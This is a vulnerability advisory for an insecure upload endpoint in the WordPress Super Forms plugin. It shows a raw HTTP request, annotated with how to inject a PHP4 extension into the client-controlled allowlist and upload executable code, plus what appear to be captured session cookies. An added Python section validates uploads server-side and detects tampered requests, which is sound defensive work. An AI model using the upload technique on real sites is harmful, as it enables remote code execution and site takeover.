WordPress [SuperForms] Plugin Unsecured File Upload leads to remote code execution

2021.01.29
ABDO10 (DZ)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Founder : ABDO10_DZ
# Date : Jan - 28 - 2021
# Exploit Title : SuperForms Unsecured file upload end point to remote code execution
# Data in HTTP request :

POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1    <=== exploit end point
Host: www.xxxxxxxxx.com
User-Agent: UserAgent
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------423513681827540048931513055996
Content-Length: 7058
Origin: https://www.xxxxxxxxxxxxx.com
Connection: close
Referer: https://www.xxxxxxxxxxx.com/employment/
Cookie: __cfduid=d7e3b556f16169a6357e2aa093b5d601f1611788435; tk_or=%22https%3A%2F%2Fwww.google.com%2F%22; tk_r3d=%22https%3A%2F%2Fwww.google.com%2F%22; tk_lr=%22https%3A%2F%2Fwww.google.com%2F%22; _ga=GA1.2.442473993.1611788453; _gid=GA1.2.1679998212.1611788453; super_session=0462c61b4dd8b5a4de7ba4407a4c0bd2%7C%7C1611790252%7C%7C1611789892; __hstc=31457313.daaedaaf15ff8afaa2713b5d9245943b.1611788454461.1611788454461.1611788454461.1; hubspotutk=daaedaaf15ff8afaa2713b5d9245943b; __hssrc=1; __hssc=31457313.5.1611788454462; cpsession=%3a3J_YLDdMLiiFkAis%2c0e16089efa7b3924ed5633fd09018e6c; timezone=America/Los_Angeles

-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="accept_file_types"

jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF    <======= inject extension (|PHP4) to validate file to upload
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="max_file_size"

8000000
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="image_library"

0
-----------------------------423513681827540048931513055996
Content-Disposition: form-data; name="files[]"; filename="filename.(extension)"    <==== inject code extension (.php4) for example
Content-Type: application/pdf

Evil codes to be uploaded
-----------------------------423513681827540048931513055996--

# Uploaded Malicious File can be Found in : /wp-content/uploads/superforms/2021/01/<id>/filename.php4
# You can get <id> from the server reply.
# To spite the damn scammers and spammers
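The request above works because the upload handler validates the filename against the accept_file_types list the client itself sends. The following Python is an added example written for this page (it is not code from the Super Forms plugin or from the advisory author) showing the two defensive pieces a practitioner would want: a server-side check that never reads the client's policy field and rejects any PHP-style extension anywhere in the name, and a detector that flags multipart upload requests whose accept_file_types value or filename has been altered. The multipart parser, the boundary string and the sample request body are constructed here for the demonstration; the expected accept_file_types value is the untampered one shown in the advisory's request.

```python
"""Defensive companion to the Super Forms upload advisory.

Added example, not plugin or advisory code. Demonstrates (1) server-side
upload validation that ignores the client-supplied accept_file_types field
and (2) request-level detection of the two manipulations the advisory uses.
"""
import os
import re
import uuid
from dataclasses import dataclass
from typing import Dict, List, Optional

# Policy lives on the server; the request's accept_file_types field is never consulted.
SERVER_ALLOWED_EXTENSIONS = frozenset({"jpg", "jpeg", "png", "gif", "pdf"})

# Anything a PHP-enabled web server might execute is rejected wherever it appears
# in the name, which also covers double extensions such as shell.php.jpg.
EXECUTABLE_EXTENSIONS = frozenset({"php", "php3", "php4", "php5", "php7", "phtml", "phar"})

# The untampered value the plugin's own form sends (from the advisory's request).
EXPECTED_ACCEPT_FILE_TYPES = "jpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF"

# Constructed boundary for the sample body below; not captured traffic.
BOUNDARY = "----demoboundary"


@dataclass
class UploadDecision:
    accepted: bool
    reason: str
    stored_name: Optional[str] = None


def validate_upload(filename: str) -> UploadDecision:
    """Hardened check: server allowlist, no executable extension, server-chosen name."""
    name = os.path.basename(filename.replace("\\", "/")).lower()  # drop any path parts
    parts = name.split(".")
    if len(parts) < 2 or not parts[0] or not parts[-1]:
        return UploadDecision(False, "missing or empty extension")  # also rejects .htaccess
    exts = parts[1:]
    if any(e in EXECUTABLE_EXTENSIONS for e in exts):
        return UploadDecision(False, f"executable extension in {name!r}")
    if exts[-1] not in SERVER_ALLOWED_EXTENSIONS:
        return UploadDecision(False, f".{exts[-1]} not in server allowlist")
    # The client's filename never reaches disk; only the vetted extension is kept.
    return UploadDecision(True, "ok", f"{uuid.uuid4().hex}.{exts[-1]}")


def parse_multipart(body: bytes, boundary: str) -> List[Dict]:
    """Minimal multipart/form-data parser: name, filename and data per part."""
    parts = []
    for chunk in body.split(b"--" + boundary.encode()):
        chunk = chunk.strip(b"\r\n")
        if not chunk or chunk == b"--":  # preamble or closing delimiter
            continue
        head, _, data = chunk.partition(b"\r\n\r\n")
        disp = head.decode(errors="replace")
        name = re.search(r'\bname="([^"]*)"', disp)        # \b keeps filename= from matching
        fname = re.search(r'filename="([^"]*)"', disp)
        parts.append({"name": name.group(1) if name else "",
                      "filename": fname.group(1) if fname else None,
                      "data": data})
    return parts


def detect_tampering(body: bytes, boundary: str) -> List[str]:
    """Flags an altered accept_file_types field and any filename the server policy rejects."""
    findings = []
    for part in parse_multipart(body, boundary):
        if part["name"] == "accept_file_types":
            value = part["data"].decode(errors="replace")
            if value != EXPECTED_ACCEPT_FILE_TYPES:
                findings.append(f"accept_file_types altered: {value!r}")
        if part["filename"] is not None:
            decision = validate_upload(part["filename"])
            if not decision.accepted:
                findings.append(f"upload {part['filename']!r} rejected: {decision.reason}")
    return findings


def build_sample_body(accept_types: str, filename: str) -> bytes:
    """Constructed request body shaped like the advisory's (placeholder file bytes)."""
    sep = f"--{BOUNDARY}\r\n".encode()
    return (
        sep + b'Content-Disposition: form-data; name="accept_file_types"\r\n\r\n'
        + accept_types.encode() + b"\r\n"
        + sep + b'Content-Disposition: form-data; name="max_file_size"\r\n\r\n8000000\r\n'
        + sep + b'Content-Disposition: form-data; name="files[]"; filename="'
        + filename.encode() + b'"\r\nContent-Type: application/pdf\r\n\r\n'
        + b"<placeholder file bytes>\r\n"
        + f"--{BOUNDARY}--\r\n".encode()
    )


if __name__ == "__main__":
    benign = build_sample_body(EXPECTED_ACCEPT_FILE_TYPES, "report.pdf")
    tampered = build_sample_body(EXPECTED_ACCEPT_FILE_TYPES + "|PHP4", "filename.php4")
    print("benign:", detect_tampering(benign, BOUNDARY))
    print("tampered:", detect_tampering(tampered, BOUNDARY))
```

The detector is most useful at a WAF or reverse proxy in front of the upload endpoint, where a mismatch on accept_file_types is a strong signal on its own because the legitimate form never changes that value. On the application side, the validator's two properties that matter are that the allowlist is not taken from the request and that the stored filename is generated by the server, so an attacker controls neither the extension check nor the final path.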

